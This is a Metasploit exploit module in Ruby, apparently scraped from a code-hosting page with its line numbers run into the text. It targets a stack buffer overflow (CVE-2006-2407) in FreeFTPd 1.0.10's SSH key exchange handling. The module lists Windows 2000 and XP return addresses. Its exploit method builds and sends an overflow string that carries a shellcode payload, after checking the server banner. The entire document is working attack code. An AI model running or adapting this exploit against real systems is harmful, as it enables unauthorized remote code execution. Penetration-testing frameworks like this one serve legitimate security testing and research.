Path: blob/master/modules/exploits/windows/ssh/freeftpd_key_exchange.rb
19566 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow',15'Description' => %q{16This module exploits a simple stack buffer overflow in FreeFTPd 1.0.1017This flaw is due to a buffer overflow error when handling a specially18crafted key exchange algorithm string received from an SSH client.19This module is based on MC's freesshd_key_exchange exploit.20},21'Author' => 'riaf <riaf[at]mysec.org>',22'License' => BSD_LICENSE,23'References' => [24['CVE', '2006-2407'],25['OSVDB', '25569'],26['BID', '17958'],27],28'DefaultOptions' => {29'EXITFUNC' => 'process',30},31'Payload' => {32'Space' => 500,33'BadChars' => "\x00",34'StackAdjustment' => -3500,35},36'Platform' => 'win',37'Targets' => [38[ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x750231e2 } ],39[ 'Windows 2000 SP0-SP4 German', { 'Ret' => 0x74f931e2 } ],40[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1d54 } ],41[ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ],42],43'Privileged' => true,44'DisclosureDate' => '2006-05-12',45'DefaultTarget' => 0,46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options(55[56Opt::RPORT(22)57]58)59end6061def exploit62connect6364sploit = "SSH-2.0-OpenSSH_3.9p1"65sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"66sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"67sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')68sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"6970res = sock.recv(40)71if (res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)72print_status("Trying target #{target.name}...")73sock.put(sploit)74else75print_status("Not running a vulnerable version...")76end7778handler79disconnect80end81end828384